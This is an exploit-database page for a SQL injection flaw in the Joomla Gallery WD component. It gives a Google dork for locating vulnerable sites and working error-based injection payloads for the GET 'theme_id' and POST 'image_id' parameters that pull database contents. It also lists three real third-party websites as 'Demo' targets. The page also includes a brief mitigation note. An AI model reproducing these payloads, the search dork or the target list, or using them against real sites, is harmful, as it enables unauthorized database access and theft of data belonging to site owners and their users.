header-logo
Suggest Exploit
vendor:
Joomla Gallery WD
by:
CrashBandicot
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Joomla Gallery WD
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2015

Joomla Gallery WD – SQL Injection Vulnerability

Parameter 'theme_id' in GET and parameter 'image_id' in POST are vulnerable to SQL Injection. An attacker can inject malicious SQL queries to gain access to the database and extract sensitive information.

Mitigation:

Input validation should be done to prevent SQL Injection attacks. Sanitize user input and use parameterized queries.
Source

Exploit-DB raw data:

######################################################################
# Exploit Title: Joomla Gallery WD - SQL Injection Vulnerability 
# Google Dork: inurl:option=com_gallery_wd
# Date: 29.03.2015
# Exploit Author: CrashBandicot (@DosPerl)
# Vendor HomePage: http://web-dorado.com/
# Source Component : http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-wd
# Tested on: Windows
######################################################################

parameter 'theme_id' in GET vulnerable

# Example :
# Parameter: theme_id (GET)
# Type: error-based
# GET Payload : index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

# ==================================================================================== #

parameter 'image_id' in POST vulnerable

# Example :
# URI : /index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2
# Parameter: image_id (POST)
# Type: error-based
# POST Payload: image_id=19 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&rate=&ajax_task=save_hit_count&task=gallerybox.ajax_search


# ~ Demo ~ # $>

http://www.cnct.tg/
http://www.nswiop.nsw.edu.au/
http://cnmect.licee.edu.ro/

#EOF

Navigation

Suggest Exploit

Services By CQR